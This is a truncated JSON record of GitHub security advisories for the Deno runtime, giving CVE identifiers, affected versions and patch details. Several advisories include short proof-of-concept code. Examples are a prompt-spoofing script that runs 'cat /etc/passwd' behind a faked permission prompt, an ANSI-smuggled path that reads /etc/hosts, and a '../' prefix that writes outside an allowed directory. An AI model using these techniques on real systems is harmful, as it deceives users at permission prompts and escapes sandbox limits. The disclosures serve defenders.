affected.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-03-06T17:03:36.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-5frw-4rwq-xhcr","https://github.com/denoland/deno/commit/de23e3b60b066481cc390f459497d5bef42a899b","https://nvd.nist.gov/vuln/detail/CVE-2024-27932","https://github.com/denoland/deno/blob/3f4639c330a31741b0efda2f93ebbb833f4f95bc/cli/auth_tokens.rs#L89","https://github.com/advisories/GHSA-5frw-4rwq-xhcr"],"source_kind":"github","identifiers":["GHSA-5frw-4rwq-xhcr","CVE-2024-27932"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-06T18:04:47.013Z","updated_at":"2026-08-29T17:07:52.205Z","epss_percentage":0.00594,"epss_percentile":0.45565,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01ZnJ3LTRyd3EteGhjcs4AA5zP","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01ZnJ3LTRyd3EteGhjcs4AA5zP","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.40.4","vulnerable_version_range":"\u003e= 1.8.0, \u003c 1.40.4"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01ZnJ3LTRyd3EteGhjcs4AA5zP/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp","url":"https://github.com/advisories/GHSA-m4pq-fv2w-6hrw","title":"Deno's deno_runtime vulnerable to interactive permission prompt spoofing via improper ANSI stripping","description":"### Summary\nA maliciously crafted permission request can show the spoofed permission prompt by inserting a broken ANSI escape sequence into the request contents.\n\n### Details\nIn [the patch for CVE-2023-28446](https://github.com/denoland/deno/commit/78d430103a8f6931154ddbbe19d36f3b8630286d), Deno is stripping any ANSI escape sequences from the permission prompt, but permissions given to the program are based on the contents that contain the ANSI escape sequences.\n\nFor example, requesting the read permission with `/tmp/hello\\u001b[/../../etc/hosts` as a path will display the `/tmp/hellotc/hosts` in the permission prompt, but the actual permission given to the program is `/tmp/hello\\u001b[/../../etc/hosts`, which is `/etc/hosts` after the normalization.\n\nThis difference allows a malicious Deno program to spoof the contents of the permission prompt.\n\n\n### PoC\nRun the following JavaScript and observe that `/tmp/hellotc/hosts` is displayed in the permission prompt instead of `/etc/hosts`, although Deno gives access to `/etc/hosts`.\n``` javascript\nconst permission = { name: \"read\", path: \"/tmp/hello\\u001b[/../../etc/hosts\" };\nawait Deno.permissions.request(permission);\nconsole.log(await Deno.readTextFile(\"/etc/hosts\"));\n```\n\n#### Expected prompt\n```\n┌ ⚠️  Deno requests read access to \"/etc/hosts\".\n├ Requested by `Deno.permissions.query()` API\n├ Run again with --allow-read to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all read permissions) \u003e\n```\n\n#### Actual prompt\n```\n┌ ⚠️  Deno requests read access to \"/tmp/hellotc/hosts\".\n├ Requested by `Deno.permissions.query()` API\n├ Run again with --allow-read to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all read permissions) \u003e\n\n```\n\n### Impact\nAny Deno program can spoof the content of the interactive permission prompt by inserting a broken ANSI code, which allows a malicious Deno program to display the wrong file path or program name to the user.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-03-05T20:54:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-m4pq-fv2w-6hrw","https://github.com/denoland/deno/commit/78d430103a8f6931154ddbbe19d36f3b8630286d","https://github.com/denoland/deno/commit/7e6b94231290020b55f1d08fb03ea8132781abc5","https://nvd.nist.gov/vuln/detail/CVE-2024-27936","https://github.com/advisories/GHSA-m4pq-fv2w-6hrw"],"source_kind":"github","identifiers":["GHSA-m4pq-fv2w-6hrw","CVE-2024-27936"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-05T21:04:54.551Z","updated_at":"2026-09-01T18:08:08.198Z","epss_percentage":0.00943,"epss_percentile":0.58577,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.147.0","vulnerable_version_range":"\u003e= 0.103.0, \u003c 0.147.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.41.0","vulnerable_version_range":"\u003e= 1.32.1, \u003c 1.41.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13cnF2LXBmNmotbXFqcM4AA5xo","url":"https://github.com/advisories/GHSA-wrqv-pf6j-mqjp","title":"Deno's Node.js Compatibility Runtime has Cross-Session Data Contamination","description":"### Summary\n\nA vulnerability in Deno's Node.js compatibility runtime allows for cross-session data contamination during simultaneous asynchronous reads from Node.js streams sourced from sockets or files. The issue arises from the re-use of a global buffer (BUF) in stream_wrap.ts used as a performance optimization to limit allocations during these asynchronous read operations. This can lead to data intended for one session being received by another session, potentially resulting in data corruption and unexpected behavior.\n\n### Details\n\nA bug in Deno's Node.js compatibility runtime results in data cross-reception during simultaneous asynchronous reads from Node.js network streams. When multiple independent network socket connections are involved, this vulnerability can be triggered. For instance, two separate server sockets that receive data from their respective client sockets and then echo the received data back to the client using Node.js streams may experience an issue where data from one socket may appear on another socket. Due to the improper isolation of the global buffer (`BUF`), data sent by one socket can end up being incorrectly received by another socket. Consequently, data intended for one session may be exposed to another session, potentially leading to data corruption and unexpected behavior.\n\nThis buffer was introduced as a performance optimization to avoid excessive allocations during network read operations.\n\nIn cases where the [net.Stream](https://nodejs.org/api/net.html) is connected to a remote server such as a database or key/value store such as Redis, this may result in a packet received on one connection being presented to another, causing data cross-contamination between multiple users and potentially leaking sensitive information.\n\nIt is important to note that this vulnerability does not affect Deno network streams created with the `Deno.listen` and `Deno.connect` APIs. \n\nThe impact of this issue may extend beyond node.js network streams, however, and may also affect asynchronous reads from non-network node.js Stream such as those created from files.\n\n### PoC\n\nhttps://github.com/denoland/deno/issues/20188\n\n### Impact\n\nThis affects all users of Deno that use the node.js compatibility layer for network communication or other streams, including packages that may require node.js libraries indirectly.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-03-05T20:49:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.2,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:L","references":["https://github.com/denoland/deno/security/advisories/GHSA-wrqv-pf6j-mqjp","https://github.com/denoland/deno/issues/20188","https://github.com/denoland/deno/commit/3e9fb8aafd9834ebacd27734cea4310caaf794c6","https://nvd.nist.gov/vuln/detail/CVE-2024-27935","https://github.com/advisories/GHSA-wrqv-pf6j-mqjp"],"source_kind":"github","identifiers":["GHSA-wrqv-pf6j-mqjp","CVE-2024-27935"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-05T21:04:54.577Z","updated_at":"2026-08-29T17:07:53.520Z","epss_percentage":0.00722,"epss_percentile":0.50539,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cnF2LXBmNmotbXFqcM4AA5xo","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13cnF2LXBmNmotbXFqcM4AA5xo","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.36.3","vulnerable_version_range":"\u003e= 1.35.1, \u003c 1.36.3"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cnF2LXBmNmotbXFqcM4AA5xo/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ocnFyLWp2OHctdjlqaM4AA5xa","url":"https://github.com/advisories/GHSA-hrqr-jv8w-v9jh","title":"Insufficient permission checking in `Deno.makeTemp*` APIs","description":"### Impact\n\nInsufficient validation of parameters in `Deno.makeTemp*` APIs would allow for creation of files outside of the allowed directories. This may allow the user to overwrite important files on the system that may affect other systems.\n\nA user may provide a prefix or suffix to a `Deno.makeTemp*` API containing path traversal characters. The permission check would prompt for the base directory of the API, but the final file that was created would be outside of this directory:\n\n```\n$ mkdir /tmp/good\n$ mkdir /tmp/bad\n$ deno repl --allow-write=/tmp/good\n\u003e Deno.makeTempFileSync({ dir: \"/tmp/bad\" })\n┌ ⚠️  Deno requests write access to \"/tmp/bad\".\n├ Requested by `Deno.makeTempFile()` API.\n├ Run again with --allow-write to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all write permissions) \u003e n\n❌ Denied write access to \"/tmp/bad\".\nUncaught PermissionDenied: Requires write access to \"/tmp/bad\", run again with the --allow-write flag\n    at Object.makeTempFileSync (ext:deno_fs/30_fs.js:176:10)\n    at \u003canonymous\u003e:1:27\n\u003e Deno.makeTempFileSync({ dir: \"/tmp/good\", prefix: \"../bad/\" })\n\"/tmp/good/../bad/a9432ef5\"\n$ ls -l /tmp/bad/a9432ef5\n-rw-------@ 1 user  group  0 Mar  4 09:20 /tmp/bad/a9432ef5\n```\n\n### Patches\n\nThis is fixed in Deno 1.41.1.\n\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-03-05T16:19:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-hrqr-jv8w-v9jh","https://nvd.nist.gov/vuln/detail/CVE-2024-27931","https://github.com/advisories/GHSA-hrqr-jv8w-v9jh"],"source_kind":"github","identifiers":["GHSA-hrqr-jv8w-v9jh","CVE-2024-27931"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-05T18:04:51.445Z","updated_at":"2026-08-29T17:07:53.526Z","epss_percentage":0.00491,"epss_percentile":0.39543,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocnFyLWp2OHctdjlqaM4AA5xa","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ocnFyLWp2OHctdjlqaM4AA5xa","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.41.1","vulnerable_version_range":"\u003c 1.41.1"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocnFyLWp2OHctdjlqaM4AA5xa/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","url":"https://github.com/advisories/GHSA-vc52-gwm3-8v2f","title":"Missing \"--allow-net\" permission check for built-in Node modules","description":"### Impact\n\nOutbound HTTP requests made using the built-in \"node:http\" or \"node:https\" modules are incorrectly not checked against the network permission allow list (`--allow-net`). Dependencies relying on these built-in modules are subject to the vulnerability too.\n\nUsers of Deno versions prior to 1.34.0 are unaffected. Deno Deploy users are unaffected.\n\n### Patches\n\nThis problem has been patched in Deno v1.34.1 and all users are recommended to update to this version.\n\n### Workarounds\n\nNo workaround is available for this issue.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-05-31T23:39:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-vc52-gwm3-8v2f","https://nvd.nist.gov/vuln/detail/CVE-2023-33966","https://github.com/denoland/deno/releases/tag/v1.34.1","https://github.com/advisories/GHSA-vc52-gwm3-8v2f"],"source_kind":"github","identifiers":["GHSA-vc52-gwm3-8v2f","CVE-2023-33966"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-06-01T00:03:15.490Z","updated_at":"2026-09-01T18:12:29.999Z","epss_percentage":0.00625,"epss_percentile":0.47532,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.115.0","vulnerable_version_range":"= 0.114.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.34.1","vulnerable_version_range":"= 1.34.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qYzk3LWgzaDktN3hoNs4AAygy","url":"https://github.com/advisories/GHSA-jc97-h3h9-7xh6","title":"Regular Expression Denial of Service in Deno.upgradeWebSocket API","description":"### Impact\nVersions of the package deno before 1.31.0 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the upgradeWebSocket function, which contains regexes in the form of /s*,s*/, used for splitting the Connection/Upgrade header. A specially crafted Connection/Upgrade header can be used to significantly slow down a web socket server. \n\n### Patches\nIt is recommended that users upgrade to Deno 1.31.0.\n\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-04-03T17:18:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6","https://nvd.nist.gov/vuln/detail/CVE-2023-26103","https://github.com/denoland/deno/pull/17722","https://github.com/denoland/deno/commit/cf06a7c7e672880e1b38598fe445e2c50b4a9d06","https://github.com/denoland/deno/blob/2b247be517d789a37e532849e2e40b724af0918f/ext/http/01_http.js#L395-L409","https://github.com/denoland/deno/releases/tag/v1.31.0","https://security.snyk.io/vuln/SNYK-RUST-DENO-3315970","https://github.com/advisories/GHSA-jc97-h3h9-7xh6"],"source_kind":"github","identifiers":["GHSA-jc97-h3h9-7xh6","CVE-2023-26103"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-04-03T18:03:21.228Z","updated_at":"2026-09-01T18:12:40.233Z","epss_percentage":0.01229,"epss_percentile":0.6679,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qYzk3LWgzaDktN3hoNs4AAygy","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qYzk3LWgzaDktN3hoNs4AAygy","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.31.0","vulnerable_version_range":"\u003e= 1.12.0, \u003c 1.31.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qYzk3LWgzaDktN3hoNs4AAygy/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","url":"https://github.com/advisories/GHSA-vq67-rp93-65qf","title":"Interactive `run` permission prompt spoofing via improper ANSI neutralization","description":"### Summary\nArbitrary program names without any ANSI filtering allows any malicious program to clear the first 2 lines of a `op_spawn_child` or `op_kill` prompt and replace it with any desired text.\n\n### Details\n\nThe main entry point comes down to the ability to override what the API control says ([40_process.js](https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175)). Because of ANSI code's ability to clear lines, a malicious program can clear the last 2 lines of the prompt and put their own header. This also works in `op_kill`.\n\n### PoC\n\nThis PoC works on 1.31.1, but modified versions of it work on older versions.\n\nMake a file, e.g. `index.ts`, that uses this vulnerability to spoof the `op_spawn_child` permission prompt\n\n```ts\nconst boldANSI = \"\\u001b[1m\" // bold\nconst unboldANSI = \"\\u001b[22m\" // unbold\n\nconst prompt = `┌ ⚠️  ${boldANSI}Deno requests run access to \"echo\"${unboldANSI}\n├ Requested by \\`Deno.Command().output()`\n\nconst moveANSIUp = \"\\u001b[1A\" // moves to the start of the line\nconst clearANSI = \"\\u001b[2K\" // clears the line\nconst moveANSIStart = \"\\u001b[1000D\" // moves to the start of the line\n\nDeno[Object.getOwnPropertySymbols(Deno)[0]].core.ops.op_spawn_child({\n    cmd: \"cat\",\n    args: [\"/etc/passwd\"],\n    clearEnv: false,\n    env: [],\n    stdin: \"null\",\n    stdout: \"inherit\",\n    stderr: \"piped\"\n}, moveANSIUp + clearANSI + moveANSIStart + prompt)\n```\n\nRun the file with `deno run index.ts`.\n\n### Impact\nAny Deno program is able to spoof the interactive permission prompt for the `op_spawn_child` or the `op_kill` action (which indirectly gives access to all run commands) by overriding the `Requested by {message} API` with their own ANSI codes, allowing them to clear the latter prompt and change it to whatever they needed:\n\n```\n// Expected Prompt\n┌ ⚠️  Deno requests run access to \"cat\"\n├ Requested by `Deno.Command().output()` API\n├ Run again with --allow-run to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) \u003e\n\n// Actual Prompt\n┌ ⚠️  Deno requests run access to \"echo\"\n├ Requested by `Deno.Command().output()` API\n├ Run again with --allow-run to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) \u003e\n```\n\nThis works with any command on the respective platform, giving the program the full ability to choose what program they wanted to run.\n\nThis problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers).\n\nBefore `v1.31.0`, this requires the `--unstable` flag. \n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-03-24T22:06:01.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-vq67-rp93-65qf","https://nvd.nist.gov/vuln/detail/CVE-2023-28446","https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175","https://github.com/denoland/deno/releases/tag/v1.31.2","https://github.com/advisories/GHSA-vq67-rp93-65qf"],"source_kind":"github","identifiers":["GHSA-vq67-rp93-65qf","CVE-2023-28446"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-03-24T23:03:48.690Z","updated_at":"2026-09-01T18:12:41.906Z","epss_percentage":0.01142,"epss_percentile":0.63506,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.31.2","vulnerable_version_range":"\u003e= 1.8.0, \u003c 1.31.2"}],"purl":"pkg:cargo/deno"},{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"1.31.2","vulnerable_version_range":"\u003e= 1.8.0, \u003c 1.31.2"}],"purl":"pkg:cargo/deno_runtime"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","url":"https://github.com/advisories/GHSA-c25x-cm9x-qqgx","title":"Deno improperly handles resizable ArrayBuffer","description":"### Impact\n\n[Resizable ArrayBuffers](https://github.com/tc39/proposal-resizablearraybuffer) passed to asynchronous native functions that are shrunk during the asynchronous operation could result in an out-of-bound read/write.\n\nIt is unlikely that this has been exploited in the wild, as the only version affected is Deno 1.32.0.\n\nDeno Deploy users are not affected.\n\n### Patches\n\nThe problem has been resolved by disabling resizable ArrayBuffers temporarily in Deno 1.32.1. A future version of Deno will re-enable resizable ArrayBuffers with a proper fix.\n\n### Workarounds\n\nUpgrade to Deno 1.32.1, or run with `--v8-flags=--no-harmony-rab-gsab` to disable resizable ArrayBuffers.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2023-03-23T23:13:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.9,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-c25x-cm9x-qqgx","https://github.com/denoland/deno/pull/18395","https://github.com/denoland/deno/releases/tag/v1.32.1","https://nvd.nist.gov/vuln/detail/CVE-2023-28445","https://github.com/denoland/deno/pull/18452","https://github.com/advisories/GHSA-c25x-cm9x-qqgx"],"source_kind":"github","identifiers":["GHSA-c25x-cm9x-qqgx","CVE-2023-28445"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-03-24T00:03:53.363Z","updated_at":"2026-09-01T18:12:32.825Z","epss_percentage":0.00971,"epss_percentile":0.585,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.103.0","vulnerable_version_range":"= 0.102.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"serde_v8","versions":[{"first_patched_version":"0.88.0","vulnerable_version_range":"= 0.87.0"}],"purl":"pkg:cargo/serde_v8"},{"ecosystem":"cargo","package_name":"Deno","versions":[{"first_patched_version":"1.32.1","vulnerable_version_range":"= 1.32.0"}],"purl":"pkg:cargo/Deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14cjl3LXg2Z3ctYzltas4AAxz0","url":"https://github.com/advisories/GHSA-xr9w-x6gw-c9mj","title":"Duplicate advisory: Deno vulnerable to Regular Expression Denial of Service","description":"## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of [GHSA-jc97-h3h9-7xh6](https://github.com/advisories/GHSA-jc97-h3h9-7xh6). This link is maintained to preserve external references.\n\n## Original Description\nVersions of the package deno before 1.31.0 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the upgradeWebSocket function, which contains regexes in the form of /s*,s*/, used for splitting the Connection/Upgrade header. A specially crafted Connection/Upgrade header can be used to significantly slow down a web socket server. This issue has been patched in version 1.31.0.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-02-25T06:30:21.000Z","withdrawn_at":"2023-04-03T17:18:44.000Z","classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-26103","https://github.com/denoland/deno/pull/17722","https://github.com/denoland/deno/commit/cf06a7c7e672880e1b38598fe445e2c50b4a9d06","https://github.com/denoland/deno/blob/2b247be517d789a37e532849e2e40b724af0918f/ext/http/01_http.js%23L395-L409","https://github.com/denoland/deno/releases/tag/v1.31.0","https://security.snyk.io/vuln/SNYK-RUST-DENO-3315970","https://github.com/advisories/GHSA-xr9w-x6gw-c9mj"],"source_kind":"github","identifiers":["GHSA-xr9w-x6gw-c9mj"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-02-28T15:03:26.646Z","updated_at":"2026-09-01T18:12:50.954Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cjl3LXg2Z3ctYzltas4AAxz0","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14cjl3LXg2Z3ctYzltas4AAxz0","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.31.0","vulnerable_version_range":"\u003c 1.31.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cjl3LXg2Z3ctYzltas4AAxz0/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tYzUyLWpwbTItY3FoNs4AAxFx","url":"https://github.com/advisories/GHSA-mc52-jpm2-cqh6","title":"Deno is vulnerable to race condition via interactive permission prompt spoofing","description":"### Impact\n\nMulti-threaded programs were able to spoof interactive permission prompt by rewriting the prompt to suggest that program is waiting on user confirmation to unrelated action. \n\nA malicious program could clear the terminal screen after permission prompt was shown and write a generic message like so:\n```\n// Expected prompt\n⚠️  ┌ Deno requests read access to \"./log.txt\".\n   ├ Requested by `Deno.open()` API\n   ├ Run again with --allow-read to bypass this prompt.\n   └ Allow? [y/n] (y = yes, allow; n = no, deny) \u003e\n\n// Prompt that users would see\nDo you want to continue?\n```\n\nThis situation impacts users who use Web Worker API and relied on interactive permission prompt. The reproduction is very timing sensitive and can’t be reliably reproduced on every try.\n\nThis problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers). \n\n### Patches\n\nThe problem has been fixed in Deno v1.29.3; it is recommended all users update to this version.\n\n### Workarounds\n\nRun with `--no-prompt` flag to disable interactive permission prompts.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-01-20T16:56:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-mc52-jpm2-cqh6","https://nvd.nist.gov/vuln/detail/CVE-2023-22499","https://github.com/denoland/deno/pull/17392","https://github.com/advisories/GHSA-mc52-jpm2-cqh6"],"source_kind":"github","identifiers":["GHSA-mc52-jpm2-cqh6","CVE-2023-22499"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-01-20T17:03:28.409Z","updated_at":"2026-09-01T18:12:40.228Z","epss_percentage":0.00601,"epss_percentile":0.45578,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tYzUyLWpwbTItY3FoNs4AAxFx","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tYzUyLWpwbTItY3FoNs4AAxFx","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.29.3","vulnerable_version_range":"\u003e= 1.9.0, \u003c 1.29.3"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tYzUyLWpwbTItY3FoNs4AAxFx/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02N2htLTI3bXgtOWNnN84AArgf","url":"https://github.com/advisories/GHSA-67hm-27mx-9cg7","title":"Link Following in Deno","description":"Deno \u003c=1.14.0 file sandbox does not handle symbolic links correctly. When running Deno with specific write access, the Deno.symlink method can be used to gain access to any directory.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-06-13T00:00:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.4,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-41641","https://github.com/denoland/deno/issues/12152","https://hackers.report/report/614876917a7b150012836bb8","https://github.com/denoland/deno/pull/12554","https://github.com/denoland/deno/commit/d44011a69e0674acfa9c59bd7ad7f0523eb61d42","https://github.com/advisories/GHSA-67hm-27mx-9cg7"],"source_kind":"github","identifiers":["GHSA-67hm-27mx-9cg7","CVE-2021-41641"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2022-12-21T16:12:17.575Z","updated_at":"2026-09-01T18:14:00.596Z","epss_percentage":0.00382,"epss_percentile":0.30964,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02N2htLTI3bXgtOWNnN84AArgf","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02N2htLTI3bXgtOWNnN84AArgf","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.16.0","vulnerable_version_range":"\u003c 1.16.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02N2htLTI3bXgtOWNnN84AArgf/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04MzhoLWpxcDYtY2YyZs02gA","url":"https://github.com/advisories/GHSA-838h-jqp6-cf2f","title":"Sandbox bypass leading to arbitrary code execution in Deno","description":"### Impact\n\nThe versions of Deno between release 1.18.0 and 1.20.2 (inclusive) are vulnerable to an attack where a malicious actor controlling the code executed in a 